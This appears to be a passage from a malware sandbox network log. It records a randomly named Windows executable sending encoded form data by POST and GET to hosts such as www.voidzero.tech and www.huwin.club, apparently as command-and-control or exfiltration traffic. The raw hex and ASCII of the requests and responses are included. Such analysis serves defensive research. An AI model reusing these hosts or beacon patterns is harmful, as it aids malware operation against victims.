                                                                                                                                                                                                                                              Data Ascii: 7Bohe=nno5Vnzppr5MStBmOFS5mSK+gTvmNJc6z9W2Bc9Pb0yhfvrRcspudWorI6usYkijp7SGFJ+JWfPNWIJa52iWSu8YI5+kyJmM10jhP4rF+qPAYcDb05zirmUUV8zZC3VcGDQhPWlqk47SUc3IPGsmsmf1twhZxbf0aIaqytaYmkPaLy4I9gsx+ARkk6AUgnIeGIGsvsIOrm7IVMQybViXBA+Ty/ZC


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              39192.168.2.55002184.32.84.32802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:08.450793982 CEST1780OUTPOST /2vbz/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.voidzero.tech
                                                                                                                                                                                                                                              Origin: http://www.voidzero.tech
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 1242
                                                                                                                                                                                                                                              Referer: http://www.voidzero.tech/2vbz/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 6e 6e 6f 35 56 6e 7a 70 70 72 35 4d 53 74 42 6d 4f 46 53 35 6d 53 4b 2b 67 54 76 6d 4e 4a 63 36 7a 39 57 32 42 63 39 50 62 30 36 68 65 64 6a 52 63 4c 64 75 63 57 6f 72 57 71 75 70 59 6b 69 75 70 34 69 43 46 4a 79 2f 57 61 4c 4e 48 65 56 61 77 6b 4b 57 62 75 38 59 51 35 2b 6c 32 4a 6d 5a 31 79 44 6c 50 34 37 46 2b 71 50 41 59 61 6e 62 67 59 7a 69 70 6d 55 58 53 38 7a 6a 51 48 56 6b 47 44 59 78 50 57 67 52 78 59 62 53 55 34 54 49 63 46 45 6d 67 6d 66 33 73 41 67 4b 78 62 69 30 61 49 47 4d 79 74 65 2b 6d 6d 76 61 49 54 39 53 68 78 41 33 36 44 5a 6c 69 49 34 71 69 6e 56 34 48 62 53 62 70 64 34 4b 76 6b 53 67 65 4c 6f 44 4a 68 33 76 63 46 72 49 77 49 77 73 64 58 73 45 6e 50 55 55 6e 66 4a 48 68 5a 73 52 44 63 55 66 5a 2b 30 57 64 32 30 56 6f 42 62 57 44 6f 53 36 6a 54 62 33 49 43 4d 35 58 39 47 6a 6d 44 6e 39 32 58 77 73 72 49 59 57 6c 6b 6b 69 51 61 6b 32 75 47 68 74 46 56 67 48 42 4f 71 34 35 6d 70 54 78 68 36 55 32 52 77 73 36 36 6b 2f 43 61 58 30 47 6b 64 42 64 66 2f 2b 4f 38 51 38 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=nno5Vnzppr5MStBmOFS5mSK+gTvmNJc6z9W2Bc9Pb06hedjRcLducWorWqupYkiup4iCFJy/WaLNHeVawkKWbu8YQ5+l2JmZ1yDlP47F+qPAYanbgYzipmUXS8zjQHVkGDYxPWgRxYbSU4TIcFEmgmf3sAgKxbi0aIGMyte+mmvaIT9ShxA36DZliI4qinV4HbSbpd4KvkSgeLoDJh3vcFrIwIwsdXsEnPUUnfJHhZsRDcUfZ+0Wd20VoBbWDoS6jTb3ICM5X9GjmDn92XwsrIYWlkkiQak2uGhtFVgHBOq45mpTxh6U2Rws66k/CaX0GkdBdf/+O8Q842TBrjfYlflM5fQhD8VBDaziC0A8tXwIMtr45rVmRd23bFIkBb3ea3FQRcQz/6YoEoIx27MHkNxAdO137fskfQM2lrsgfMABmOAa0NNDLyhzHiZyjsIGv06BbYq74NymbEWD1abz4DESnefEFOiS9+cfvDR+bVWes28o75pvbxijW6OB44VdszivbozWXnT9BChBtntstZxnBU3Ohl65kuypDnZHhr8wwwYEE4amYcXo8/BOK5s3VusIZWfy+K+M4GTmr+/bK6vw2jPUIpA8Nk5W6hEKnQqpEmUKtRhoLqhfwDeQso0WA3kspLtXcHaV0JvjYF9bKhOGbUvQ6Qh/fS1MIOEKCOSScRPDMmLTCtQBQ7JX7U/fha+bTn7wEtZM1Q+6+M3X4i0CqmmgVDuNbu0EXJe0KenJc03+WOcTrx96sVP+hMDZh13vhqr3Mxuj1p5kWv3VFJ27jpPod1sBuLKkOfYvvJi5EiqTCpn1vB3ZtBKz2UZowb9qFoavcMn4pi7zp8Qe/l09UkvGDa0UYUoSLdHoD17teS8NNWoaw1NHvLt7RRwNiYagZs0kIZjrZa0NUn6+hiK+oYXfPAvjsJpzW9A3RjJtN83W7FRcxfAGbJc3MvpjTfWFk8oq/mh5I7a34tnnjLpeMsdXlnNLU95f419xC5+y5G [TRUNCATED]


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              40192.168.2.55002284.32.84.32802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:11.091556072 CEST483OUTGET /2vbz/?7Bohe=qlAZWX/ch455H6hDeAWyjxeCoVjeFLImmNyoFLJZcRWWfOSwb/dYbmE5Lo+ESXiDiuCMQOi3bdztXr54sGaKYuw5X5+G7ZC+wzrMILyG35q/IsHjv6ziuhAlYbb1UGsQUw==&vD=h0e85v HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.voidzero.tech
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:11.897954941 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: hcdn
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:20:11 GMT
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Content-Length: 10072
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              x-hcdn-request-id: 41a73d54845e6844977d062eeb229dfe-int-edge2
                                                                                                                                                                                                                                              Expires: Thu, 24 Oct 2024 13:20:10 GMT
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:11.897986889 CEST1236INData Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                                                                                                                                                                                                                                              Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:11.898009062 CEST1236INData Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
                                                                                                                                                                                                                                              Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:11.898046970 CEST1236INData Raw: 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
                                                                                                                                                                                                                                              Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:11.898066044 CEST1236INData Raw: 65 6c 63 6f 6d 65 2f 69 6d 61 67 65 73 2f 68 6f 73 74 69 6e 67 65 72 2d 6c 6f 67 6f 2e 73 76 67 20 61 6c 74 3d 48 6f 73 74 69 6e 67 65 72 20 77 69 64 74 68 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c
                                                                                                                                                                                                                                              Data Ascii: elcome/images/hostinger-logo.svg alt=Hostinger width=120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidd
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:11.898085117 CEST1236INData Raw: 78 20 63 6f 6c 75 6d 6e 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d
                                                                                                                                                                                                                                              Data Ascii: x column-wrap"><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:11.898107052 CEST1236INData Raw: 28 29 7b 74 68 69 73 2e 75 74 66 31 36 3d 7b 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 2c 65 2c 6e 3d 5b 5d 2c 74 3d 30 2c 61 3d 6f 2e 6c 65 6e 67 74 68 3b 74 3c 61 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d
                                                                                                                                                                                                                                              Data Ascii: (){this.utf16={decode:function(o){for(var r,e,n=[],t=0,a=o.length;t<a;){if(55296==(63488&(r=o.charCodeAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:11.898231983 CEST1236INData Raw: 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 32 29 22 29 3b 69 66 28 73 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 70 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72
                                                                                                                                                                                                                                              Data Ascii: ("punycode_bad_input(2)");if(s>Math.floor((r-f)/p))throw RangeError("punycode_overflow(1)");if(f+=s*p,s<(C=g<=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p*=o-C}if(i=n(f-l,h=m.length+1,0===l),Mat
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:11.898252964 CEST524INData Raw: 77 5b 64 5d 3f 31 3a 30 29 29 29 2c 75 3d 6e 28 66 2c 69 2b 31 2c 69 3d 3d 63 29 2c 66 3d 30 2c 2b 2b 69 7d 7d 2b 2b 66 2c 2b 2b 68 7d 72 65 74 75 72 6e 20 79 2e 6a 6f 69 6e 28 22 22 29 7d 2c 74 68 69 73 2e 54 6f 41 53 43 49 49 3d 66 75 6e 63 74
                                                                                                                                                                                                                                              Data Ascii: w[d]?1:0))),u=n(f,i+1,i==c),f=0,++i}}++f,++h}return y.join("")},this.ToASCII=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/[^A-Za-z0-9-]/)?"xn--"+punycode.encode(t):t)}return e.join(".")},this.ToUnicode


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              41192.168.2.5500233.33.130.190802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:17.070478916 CEST734OUTPOST /cvus/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.huwin.club
                                                                                                                                                                                                                                              Origin: http://www.huwin.club
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 206
                                                                                                                                                                                                                                              Referer: http://www.huwin.club/cvus/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 47 34 58 6f 6a 6b 66 62 6d 30 63 67 56 2b 71 57 48 71 4a 44 70 79 34 2b 47 64 6f 49 50 49 53 54 34 41 4a 6c 6b 5a 53 53 2b 48 67 4a 4e 58 30 42 37 76 59 66 35 49 43 64 35 46 34 57 35 44 57 30 65 6d 36 61 36 2f 36 73 66 48 66 41 6d 61 57 6f 74 6e 47 73 4c 68 62 56 44 66 36 43 79 44 2f 5a 31 6b 73 71 52 4f 2f 62 6c 43 46 52 66 36 58 37 54 56 57 42 57 51 38 50 56 79 51 78 53 42 65 71 36 75 4d 4b 72 77 53 78 45 2f 62 39 4d 58 47 56 7a 37 33 70 71 77 42 30 59 45 49 41 61 59 55 4a 50 6b 39 4b 43 32 31 30 72 7a 73 64 59 65 67 30 65 58 56 46 6c 71 51 44 6a 31 43 70 30 52 4c 68 70 71 38 50 74 39 41 3d
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=G4Xojkfbm0cgV+qWHqJDpy4+GdoIPIST4AJlkZSS+HgJNX0B7vYf5ICd5F4W5DW0em6a6/6sfHfAmaWotnGsLhbVDf6CyD/Z1ksqRO/blCFRf6X7TVWBWQ8PVyQxSBeq6uMKrwSxE/b9MXGVz73pqwB0YEIAaYUJPk9KC210rzsdYeg0eXVFlqQDj1Cp0RLhpq8Pt9A=


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              42192.168.2.5500243.33.130.190802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:19.623116016 CEST754OUTPOST /cvus/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.huwin.club
                                                                                                                                                                                                                                              Origin: http://www.huwin.club
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 226
                                                                                                                                                                                                                                              Referer: http://www.huwin.club/cvus/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 47 34 58 6f 6a 6b 66 62 6d 30 63 67 45 74 79 57 47 4a 68 44 2b 43 34 39 62 74 6f 49 42 6f 53 58 34 41 31 6c 6b 62 2b 38 2b 31 30 4a 4e 33 6b 42 38 61 73 66 36 49 43 64 72 6c 35 63 33 6a 57 6a 65 6d 32 34 36 2f 47 73 66 48 62 41 6d 62 6d 6f 74 55 2b 72 4b 78 62 54 62 76 36 41 38 6a 2f 5a 31 6b 73 71 52 4f 72 31 6c 42 31 52 66 72 6e 37 54 30 57 43 4b 41 38 4d 53 79 51 78 44 52 66 74 36 75 4d 6f 72 78 50 55 45 38 6a 39 4d 57 61 56 30 71 33 75 67 77 42 79 57 6b 4a 77 5a 71 42 57 44 55 35 34 66 58 6f 56 39 67 55 33 5a 6f 4e 65 45 31 64 74 32 4b 38 37 7a 6d 4b 65 6c 68 71 49 7a 4a 73 2f 7a 71 58 41 42 6e 46 64 52 67 78 63 54 4c 58 39 44 68 62 51 33 5a 44 34
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=G4Xojkfbm0cgEtyWGJhD+C49btoIBoSX4A1lkb+8+10JN3kB8asf6ICdrl5c3jWjem246/GsfHbAmbmotU+rKxbTbv6A8j/Z1ksqROr1lB1Rfrn7T0WCKA8MSyQxDRft6uMorxPUE8j9MWaV0q3ugwByWkJwZqBWDU54fXoV9gU3ZoNeE1dt2K87zmKelhqIzJs/zqXABnFdRgxcTLX9DhbQ3ZD4


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              43192.168.2.5500253.33.130.190802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:22.168350935 CEST1771OUTPOST /cvus/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.huwin.club
                                                                                                                                                                                                                                              Origin: http://www.huwin.club
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 1242
                                                                                                                                                                                                                                              Referer: http://www.huwin.club/cvus/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 47 34 58 6f 6a 6b 66 62 6d 30 63 67 45 74 79 57 47 4a 68 44 2b 43 34 39 62 74 6f 49 42 6f 53 58 34 41 31 6c 6b 62 2b 38 2b 31 73 4a 4e 6b 63 42 2f 35 30 66 37 49 43 64 77 6c 35 66 33 6a 57 2b 65 6d 75 38 36 2f 4c 5a 66 46 7a 41 6e 35 43 6f 36 56 2b 72 42 78 62 54 53 50 36 42 79 44 2f 32 31 6c 41 75 52 4f 37 31 6c 42 31 52 66 6f 50 37 44 31 57 43 49 41 38 50 56 79 51 4c 53 42 66 4a 36 75 45 5a 72 78 4b 68 45 4d 44 39 4e 32 4b 56 79 59 76 75 39 41 42 77 62 45 4a 6f 5a 71 64 7a 44 55 30 44 66 58 63 7a 39 67 73 33 62 2b 55 52 52 30 42 6e 67 4a 4d 37 7a 45 69 73 79 55 71 57 31 61 63 50 73 34 57 36 46 33 46 77 52 6e 68 6f 59 4c 75 76 59 6e 6a 38 79 4a 32 62 70 2b 56 44 37 68 59 67 58 52 32 62 6b 52 58 57 33 4f 46 66 55 2b 46 66 50 42 47 75 33 33 68 44 58 63 48 30 79 52 7a 71 41 6f 34 65 62 4c 4f 4b 33 6e 6a 37 65 59 31 47 6c 72 37 6b 46 35 65 71 42 6e 6a 65 5a 55 31 55 6e 38 73 6d 71 47 48 69 54 4e 5a 42 69 5a 49 65 30 62 42 33 36 55 32 74 6b 39 4e 39 42 4a 6a 59 55 63 2b 7a 57 75 79 70 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=G4Xojkfbm0cgEtyWGJhD+C49btoIBoSX4A1lkb+8+1sJNkcB/50f7ICdwl5f3jW+emu86/LZfFzAn5Co6V+rBxbTSP6ByD/21lAuRO71lB1RfoP7D1WCIA8PVyQLSBfJ6uEZrxKhEMD9N2KVyYvu9ABwbEJoZqdzDU0DfXcz9gs3b+URR0BngJM7zEisyUqW1acPs4W6F3FwRnhoYLuvYnj8yJ2bp+VD7hYgXR2bkRXW3OFfU+FfPBGu33hDXcH0yRzqAo4ebLOK3nj7eY1Glr7kF5eqBnjeZU1Un8smqGHiTNZBiZIe0bB36U2tk9N9BJjYUc+zWuypB0fqdZu6tdywidYe//1ubagrAW06OFAqx0oMJnTYrE5dDp2IjDPYWOe8jArGZfAJiLAv/X4vTo+516hP+4ArUS1AVsIhWFTr81/euz40N4oULJoTZAXbdfIOaN/mYVG2sr6QMJaQ6Pq6ifIRsmATCZ3BdQfKjjkdZWFx/ou/Q1xfB1iBpSm9zjveIXSB6lgBiLLCGmtUbv8WOLsnaqCZEL165xVkvkpCeiMs40RcKPuupy8nGLLqImY//usnBcbo1BZ6J13hVTjDiklQLWJzRPSa9qoUcIFBjLVfqtyCvI1b8aHH+wyDBOFgNIr4wBrCUPZqK/ElU6gYiO+XuwC0Uh0/pKWejKEAB6gNhDLFl15yRZQ39HMk0Fho9yzwU3fRZQk9IxCcshJ3dHbH+oMKngAKxfQWwoJjElFpsuvnRruhp3iAWXJdIY68nFBvCAPPlOyfduoY8Ic4M7L2HmnTWl/ctHYq6Ap+CFmBxqTetwjsxbMagnrpXUjMz97mPvEFfurqQDzm5ELYdmrqWDKbE76KdS3UaEbA/6te2Pg2mWNsF9U3tcp6S092ddy3yG6g0kyDGjliAwtLukalT9KYzdWfxHQUXpVvhPdewrFB1Ht59IZ9FJSESAQXPGqaDNKhbnhBU2tnlOmNQ3J8ZIe+N4vW+Vv0/W74qn [TRUNCATED]


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              44192.168.2.5500263.33.130.190802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:24.710629940 CEST480OUTGET /cvus/?7Bohe=L6/IgR7jnWgHAqCUWtdTnyQ3KOMoF6iy/gVxl52J0nU+SVs5srMG6NDyylAnxUOxWBqWqLnFW3nZioCT6UqXKC7zbsKc4BTPzCMAY+nXmzAcPovgamuSI2ghdEMnHjenpA==&vD=h0e85v HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.huwin.club
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:25.337759972 CEST403INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:20:25 GMT
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Content-Length: 263
                                                                                                                                                                                                                                              Connection: close
